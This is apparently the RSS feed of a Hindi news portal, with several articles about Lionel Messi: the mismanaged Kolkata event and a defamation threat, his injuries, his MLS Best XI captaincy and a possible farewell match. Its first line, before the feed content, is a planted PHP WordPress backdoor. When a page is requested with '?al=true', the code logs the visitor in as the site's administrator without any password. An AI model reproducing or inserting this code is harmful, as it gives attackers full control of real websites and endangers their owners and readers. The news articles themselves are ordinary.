// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Lionel Messi – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Thu, 07 May 2026 11:28:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 मेसी कार्यक्रम कुप्रबंधन मामले में 100 करोड़ मानहानि की चेतावनी https://pratyushaashakinayikiran.com/?p=217645 Thu, 07 May 2026 11:28:00 +0000 https://pratyushaashakinayikiran.com/?p=217645  कोलकाता

 कोलकाता के साल्टलेक स्टेडियम में अर्जेंटीना के दिग्गज फुटबॉलर लियोन मेसी के कार्यक्रम के दौरान हुए कुप्रबंधन मामले में मुख्य आयोजक शतद्रु दत्ता ने बंगाल के पूर्व खेल मंत्री अरूप बिश्वास के विरुद्ध 100 करोड़ रुपये के मानहानि मुकदमे की चेतावनी दी है। उन्होंने कहा कि जरूरत पड़ने पर वे सुप्रीम कोर्ट तक जाएंगे।

हजारों फैंस भड़क गए थे
मेसी अपनी इंटर मियामी टीम के सदस्यों लुइस सुआरेज और रोड्रिगो डी पाल के साथ पिछले साल दिसंबर में भारत दौरे पर आए थे। पहले चरण में वह कोलकाता पहुंचे थे। साल्टलेक स्टेडियम में उनका कार्यक्रम था, लेकिन कुप्रबंधन के कारण उन्हें महज 25 मिनट के भीतर स्टेडियम से बाहर निकालना पड़ा, जिससे वहां मौजूद हजारों प्रशंसक भड़क गए थे और हंगामा मचाना शुरू कर दिया था।

शतद्रु को गिरफ्तार किया गया था
मामले में शतद्रु को मेसी को हैदराबाद ले जाते वक्त कोलकाता एयरपोर्ट पर चार्टर्ड प्लेन से गिरफ्तार किया गया था। उन्होंने 39 दिन हिरासत में बिताए थे। इस घटना को लेकर अरूप बिश्वास की भूमिका भी सवालों के घेरे में आई थी क्योंकि ग्राउंड पर वीआईपी की भीड़ के कारण आम दर्शकों को मेसी की झलक नहीं मिल पाई थी।
यह वीडियो भी देखें

टालीगंज सीट से पराजित हुए अरूप
अरूप विधानसभा चुनाव में टालीगंज सीट से पराजित हुए हैं। शतद्रु ने इंटरनेट मीडिया पर पोस्ट करके कहा-'सिर्फ चुनाव हारने से यह मत समझिए कि आपको सजा मिल गई है। मैं मानहानि का मामला करूंगा और जरूरत पड़ी तो सुप्रीम कोर्ट जाऊंगा। मैंने बार-बार अरूप बिश्वास को कार्यक्रम स्थल पर फोटो खिंचवाने से मना किया था लेकिन उन्होंने अपने पद का इस्तेमाल कर नियमों की अनदेखी की। मेरी पीड़ा किसी ने नहीं सुनी, पुलिस भी खामोश रही। मेसी को लाने में मेरी तीन साल की मेहनत बर्बाद कर दी गई। मेरी टीम पर दबाव बनाकर ग्राउंड एक्सेस कार्ड जारी करवाए गए और मना करने पर धमकाया गया।'

 

]]>
इंटर मियामी को झटका! चोटिल लियोनेल मेस्सी का पहले मैच में उतरना मुश्किल https://pratyushaashakinayikiran.com/?p=197550 Fri, 13 Feb 2026 10:16:00 +0000 https://pratyushaashakinayikiran.com/?p=197550 फोर्ट लॉडरडेल (अमेरिका)
स्टार फुटबॉलर लियोनेल मेस्सी की बायीं हैमस्ट्रिंग में खिंचाव आ गया है जिसके कारण उनका इंटर मियामी की तरफ से एमएलएस कप में 21 फरवरी को एलएएफसी के खिलाफ होने वाले सत्र के पहले मैच में खेलना संदिग्ध है।

इंटर मियामी की टीम ने बुधवार को मेस्सी के चोटिल होने के बारे में जानकारी दी। एमएलएस के लगातार दो बार के सर्वश्रेष्ठ खिलाड़ी मेस्सी ने पिछले सप्ताहांत इक्वाडोर में सत्र से पहले खेले गए मैच में एक गोल किया, लेकिन दूसरे हाफ के लगभग 12 मिनट बाद उन्हें संभवतः हैमस्ट्रिंग में खिंचाव के कारण मैदान छोड़ना पड़ा था। इंटर मियामी ने एक बयान में कहा, ‘‘अभ्यास में उनकी वापसी आने वाले दिनों में उनकी फिटनेस की प्रगति पर निर्भर करेगी।’’

 

]]>
लियोनेल मेसी 2025 एमएलएस बेस्ट इलेवन टीम के कप्तान चुने गए https://pratyushaashakinayikiran.com/?p=189645 Thu, 06 Nov 2025 14:53:00 +0000 https://pratyushaashakinayikiran.com/?p=189645 मियामी
फुटबॉल सुपरस्टार लियोनेल मेसी को इस सीज़न के मेजर लीग सॉकर (एमएलएस) की सर्वश्रेष्ठ टीम (बेस्ट इलेवन) का कप्तान चुना गया है। इस सूची में नौ अलग-अलग क्लबों के खिलाड़ियों को जगह मिली है।

इंटर मियामी के इस अर्जेंटीनी फॉरवर्ड ने इस सीज़न में 29 गोल और 19 असिस्ट किए, यानी कुल 48 गोल योगदान दिए — जो 2019 में कार्लोस वेला द्वारा बनाए गए 49 योगदानों के रिकॉर्ड से बस एक कम है। मेसी अब लीग इतिहास में लगातार दो बार एमवीपी पुरस्कार जीतने वाले पहले खिलाड़ी बनने की राह पर हैं।

बुधवार को एमएलएस द्वारा घोषित इस सूची में सात देशों के खिलाड़ी शामिल हैं, जिनमें से छह खिलाड़ी पहली बार बेस्ट इलेवन में जगह बना पाए हैं।

फिलाडेल्फिया यूनियन (जेकब ग्लेसनेस और काई वाग्नर) और वैंकूवर व्हाइटकैप्स (ट्रिस्टन ब्लैकमोन और सेबेस्टियन बर्हाल्टर) ऐसी दो टीमें हैं जिनके दो-दो खिलाड़ी इस सूची में शामिल हैं। बेस्ट इलेवन का चयन हर साल मीडिया, एमएलएस खिलाड़ियों और क्लब टेक्निकल स्टाफ के वोटों से किया जाता है।

2025 एमएलएस बेस्ट इलेवन टीम

गोलकीपर: डेन सेंट क्लेयर (मिनेसोटा यूनाइटेड एफसी)।

डिफेंडर: ट्रिस्टन ब्लैकमोन (वैंकूवर व्हाइटकैप्स), एलेक्स फ्रीमैन (ऑरलैंडो सिटी), जेकब ग्लेसनेस (फिलाडेल्फिया यूनियन), काई वाग्नर (फिलाडेल्फिया यूनियन)।

मिडफील्डर: सेबेस्टियन बर्हाल्टर (वैंकूवर व्हाइटकैप्स), इवांडर (एफसी सिनसिनाटी), क्रिस्टियन रोल्डन (सिएटल साउंडर्स)।

फॉरवर्ड: डेनिस बुआंगा (एलएएफसी), एंडर्स ड्रेयर (सैन डिएगो एफसी), लियोनेल मेसी ( कप्तान) (इंटर मियामी सीएफ)।

 

]]>
लियोनेल मेसी ने इशारा किया इंटरनेशनल करियर से रिटायरमेंट का, फेयरवेल मैच की तारीख भी बताई https://pratyushaashakinayikiran.com/?p=181522 Fri, 29 Aug 2025 08:28:00 +0000 https://pratyushaashakinayikiran.com/?p=181522 ब्यूनस आयर्स

फुटबॉल के सबसे बड़े स्टार में से एक लियोनल मेसी ने एक बड़ा इशारा दे दिया है कि अर्जेंटीना के साथ उनका सफर आखिर दौर में पहुंच रहा है. 38 साल के मेसी ने Apple TV से बात करते हुए कहा कि 4 सितंबर को ब्यूनस आयर्स में वेनेजुएला के खिलाफ होने वाला वर्ल्ड कप क्वालिफायर शायद उनका आखिरी घरेलू मैच हो सकता है. 

अर्जेंटीना पहले ही 2026 वर्ल्ड कप के लिए क्वालिफाई कर चुका है और 35 अंकों के साथ साउथ अमेरिकन टेबल में टॉप पर है. लेकिन मेसी के लिए ब्यूनर्स आयर्स के एस्टादियो मोन्यूमेंटल (Estadio Monumental) में होने वाला यह मैच सिर्फ एक कंपटीशन भर नहीं है, बल्कि यह उनके लिए बड़ा इमोशनल मोमेंट होगा. 

ल‍ियोनेल मेसी ने अपने फेयरवेल मैच के बारे में क्या कहा? 
मेसी ने इंटर मियामी की लीग्स कप सेमीफाइनल में ऑरलैंडो सिटी को हराने के बाद कहा- यह मेरे लिए खास होने वाला है, बहुत ही खास मैच होगा, क्योंकि यह मेरा आखिरी क्वालिफायर गेम है. मुझे नहीं पता इसके बाद कोई फ्रेंडली या और मैच होंगे या नहीं…. पर हां, यह मैच मेरे लिए बहुत खास है और इसी वजह से मेरा पूरा परिवार मेरे साथ होगा. मेरी पत्नी, मेरे बच्चे, मेरे माता-पिता, मेरे भाई-बहन और मेरी पत्नी की तरफ से जितने रिश्तेदार हो सकें. इसके बाद क्या होगा, यह मैं नहीं जानता, लेकिन अभी हमारा ध्यान इसी पर है. 

कैसा है मेसी का वर्ल्ड कप क्वाल‍िफायर में रिकॉर्ड 
मेसी का वर्ल्ड कप क्वालिफायर में 193 मैच खेले हैं और रिकॉर्ड 31 गोल किए हैं. इसी दौरान उन्होंने अर्जेंटीना के लिए कई यादगार प्रदर्शन भी किए. 2022 में कतर वर्ल्ड कप जीतना उनके इंटरनेशनल करियर की सबसे बड़ी उपलब्धि रही, जिसने उन्हें फुटबॉल इतिहास के महान खिलाड़ियों में हमेशा के लिए जगह दिला दी. 

मेसी 9 सितंबर को इक्वाडोर के खिलाफ होने वाले अगले क्वालिफायर मैच में भी खेलने की उम्मीद है, लेकिन वह मैच बाहर (अवे) होगा. ऐसे में 4 सितंबर को ब्यूनस आयर्स में होने वाला मुकाबला शायद आखिरी मौका होगा जब स्थानीय फैन्स उन्हें वर्ल्ड कप क्वालिफायर में खेलते देख पाएंगे. 

अगर यह सचमुच उनका आखिरी मैच होता है, तो यह अर्जेंटीना के फुटबॉल इतिहास का एक अहम अध्याय बंद कर देगा. हालांकि मेसी ने अभी तक इंटरनेशनल फुटबॉल से संन्यास लेने की कोई आधिकारिक घोषणा नहीं की है. 

फुटबॉल इत‍िहास में सबसे ज्यादा इंटरनेशनल गोल 
क्रिस्टियानो रोनाल्डो (पुर्तगाल) – 221 मैच, 138 गोल 
लियोनल मेसी (अर्जेंटीना) – 193 मैच, 112 गोल 
अली दाई (ईरान) – 148 मैच , 108 गोल
सुनील छेत्री (भारत) – 155 मैच  95 गोल 
रोमेलू लुकाकू (बेल्जियम) – 124 मैच खेले, 89 गोल

कैसे होते हैं फुटबॉल के क्वाल‍िफायर मैच? 
कॉनमेबोल (South American Football Confederation) साउथ अमेर‍िकी में फुटबॉल से संबध‍ित देशों को चलाने वाली एक गवर्न‍िंग बॉडी है. इसी तरह हर महाद्वीप की गवर्न‍िंंग बॉडी हैं.   कॉनमेबोल के द‍िशा न‍िर्देश में वर्ल्ड कप क्वालिफायर 7 सितंबर 2023 से शुरू हुए और सितंबर 2025 में खत्म होंगे. 

हिस्सा लेने वाले देश
अर्जेंटीना, बोलीविया, ब्राजील, चिली, कोलंबिया, इक्वाडोर, पराग्वे, पेरू, उरुग्वे और वेनेजुएला. 

कैसे होते हैं क्वाल‍िफाइंग मैच 
हर टीम बाकी 9 टीमों से एक-एक मैच घर (होम) और बाहर (अवे) खेलेगी. यानी कुल 18 मैच. 18 राउंड के बाद जो टीमें टॉप-6 में रहेंगी, वे सीधे FIFA World Cup 2026 के लिए क्वालिफाई कर लेंगी. जो टीम सातवें नंबर पर रहेगी, उसे FIFA Play-Off Tournament खेलना होगा. 

]]>
भारत आएंगे फुटबॉल लीजेंड मेसी, मुंबई में 14 दिसंबर को होगा खास इवेंट https://pratyushaashakinayikiran.com/?p=175105 Sat, 02 Aug 2025 15:16:00 +0000 https://pratyushaashakinayikiran.com/?p=175105 नई दिल्ली/ब्यूनस आयर्स
 अर्जेंटीना के स्टार फुटबॉलर लियोनेल मेसी दिसंबर में भारत दौरे पर आएंगे। मेसी 14 साल के लंबे समय के बाद भारत आ रहे हैं। वो 13 से 15 दिसंबर तक भारत में रहेंगे और कुल तीन शहरों का दौरा करेंगे।

रिपोर्ट के मुताबिक, मेसी 13 से 15 दिसंबर तक कोलकाता, दिल्ली और मुंबई का दौरा करेंगे। मुंबई में वानखेड़े स्टेडियम 14 दिसंबर को एक इवेंट में शामिल होंगे। मुंबई क्रिकेट एसोसिएशन (एमसीए) के एक सूत्र ने टाइम्स ऑफ इंडिया को बताया, कुछ क्रिकेटर्स भी इस इवेंट में शामिल होंगे।

ईडन गार्डन्स स्टेडियम भी जाएंगे
इसके अलावा मेसी कोलकाता भी जाएंगे और वहां उनको ईडन गार्डन में सम्मानित किया जाएगा। इस इवेंट में वेस्ट बंगाल की चीफ मिनिस्टर ममता बनर्जी भी शामिल हो सकती हैं। मेसी कोलकाता में बच्चों के लिए एक फुटबॉल वर्कशॉप भी आयोजित करवाएंगे और साथ ही वो फुटबॉल क्लिनिक भी लॉन्च करेंगे।

कोलकाता जाएंगे मेसी

इसके अलावा मेसी कोलकाता भी जाएंगे और वहां उनको ईडन गार्डन में सम्मानित भी किया जाएगा. इस इवेंट में वेस्ट बंगाल की चीफ मिनिस्टर ममता बनर्जी भी शामिल हो सकती हैं. कोलकाता में अपने दौरे के दौरान लियोनेल बच्चों के लिए एक फुटबॉल वर्कशॉप भी आयोजित करवाएंगे और साथ ही वो फुटबॉल क्लिनिक को भी लॉन्च करेंगे. उनके सम्मान में ‘Goat Cup’ टूर्नामेंट का भी आयोजन होगा.

6 जून को केरल के स्पोर्ट्स मिनिस्टर ने इस बात की पुष्टि की है कि अर्जेंटीना फुटबॉल टीम जिनकी कप्तानी लियोनेल मेसी करेंगे वो अक्टूबर या नवंबर में केरल एक फ्रेंडली मैच खेलने आएंगे. ये मुकाबला तिरुवंतपुरम के ग्रीनफील्ड इंटरनेशनल स्टेडियम में होगा. केरल सरकार से इसकी बात हो चुकी है.
2011 में आए थे आखिरी बार

लियोनेल मेसी ने इससे पहले 2011 में भारत का दौरा किया था. उन्होंने कोलकाता के साल्ट लेक स्टेडियम में वेनेजुएला के खिलाफ फ्रेंडली मैच खेला था. अब 14 साल के बाद वो एक बार फिर से भारत का दौरा कर रहे हैं. ये सुनकर फुटबॉल के सभी फैंस काफी खुश है.

फ्रेंडली मैच भी खेलेंगे
इससे पहले, 6 जून को केरल के स्पोर्ट्स मिनिस्टर वी. अब्दुरहीमन नहीं इस बात की पुष्टि की थी कि अर्जेंटीना फुटबॉल टीम जिनकी कप्तानी लियोनेल मेसी करेंगे वो अक्टूबर या नवंबर में केरल एक फ्रेंडली मैच खेलने आएंगे। ये मुकाबला तिरुवंतपुरम के ग्रीनफील्ड इंटरनेशनल स्टेडियम में होगा। केरल सरकार से इसकी बात हो चुकी है।

साल 2011 में भारत आए थे मेसी
मेसी सहित अर्जेंटीना फुटबॉल टीम पिछली बार 2011 में वेनेजुएला के खिलाफ इंटरनेशनल फ्रेंडली मैच के लिए भारत आई थी। अर्जेंटीना और वेनेजुएला के बीच यह मैच 2 सितंबर को कोलकाता के सॉल्ट लेक स्टेडियम में खेला गया था। इस मैच में मेसी के असिस्ट से निकोलस ओटामेंडी ने दूसरे हाफ में हेडर से गोल कर अर्जेंटीना को 1-0 से जीत दिलाई थी।

अर्जेंटीना मौजूदा वर्ल्ड चैंपियन
अर्जेंटीना मौजूदा वर्ल्ड चैंपियन है। टीम ने 2022 में खेले गए फीफा वर्ल्ड कप फाइनल में फ्रांस को पेनल्टी शूट आउट में 4-2 से हराकर खिताब जीता था। अर्जेंटीना को इससे पहले 1986 में खिताबी कामयाबी मिली थी। अर्जेंटीना का यह ओवरऑल तीसरा खिताब रहा। टीम 1978 में पहली बार वर्ल्ड चैंपियन बनी थी।

]]>
इंटर मियामी के लिए वापसी को तैयार लियोनेल मेसी https://pratyushaashakinayikiran.com/?p=70451 Sat, 14 Sep 2024 15:26:00 +0000 https://pratyushaashakinayikiran.com/?p=70451 वाशिंगटन
लियोनेल मेसी चोट के कारण दो महीने से अधिक समय तक बाहर रहने के बाद इस सप्ताह के अंत में इंटर मियामी के लिए एक्शन में लौटने के लिए तैयार हैं। 37 वर्षीय अर्जेंटीना के कप्तान मेसी ने जुलाई में कोपा अमेरिका फाइनल में कोलंबिया पर एल्बीसेलेस्टे की 1-0 की जीत के दौरान टखने की चोट के बाद से नहीं खेला है। हालांकि वह पूर्ण प्रशिक्षण पर लौट आए हैं और शनिवार को फिलाडेल्फिया के खिलाफ इंटर मियामी के घरेलू मुकाबले के लिए उनका खेलना तय है। इंटर मियामी के प्रबंधक गेरार्डो मार्टिनो ने शुक्रवार को संवाददाताओं से कहा, हां, वह ठीक हैं। उन्होंने गुरुवार को प्रशिक्षण लिया और वह मैच के लिए हमारी योजनाओं में है। आज प्रशिक्षण के बाद हम उसके लिए रणनीति के बारे में सोचेंगे, लेकिन वह उपलब्ध हैं। मेसी के नाम इस सीजन में 12 मेजर लीग सॉकर मैचों में 12 गोल और 13 सहायता हैं।

मार्टिनो आठ बार के बैलन डी'ओर विजेता की मैच फिटनेस की कमी से चिंतित नहीं थे, उन्होंने कहा कि उनकी उपस्थिति मात्र से फ्लोरिडा टीम को बड़ा बढ़ावा मिलेगा।
मार्टिनो ने कहा, अपनी टीम के लिए दुनिया के सर्वश्रेष्ठ खिलाड़ी का वापस स्वागत करना, जो पहले से ही अच्छे प्रदर्शन पर थी, हम सभी को बहुत खुशी हो रही है। इंटर मियामी वर्तमान में 27 मैचों में 59 अंकों के साथ मेजर लीग सॉकर के ईस्टर्न कॉन्फ्रेंस स्टैंडिंग में शीर्ष पर है, जो दूसरे स्थान पर मौजूद सिनसिनाटी से आठ अंक आगे है।

 

]]>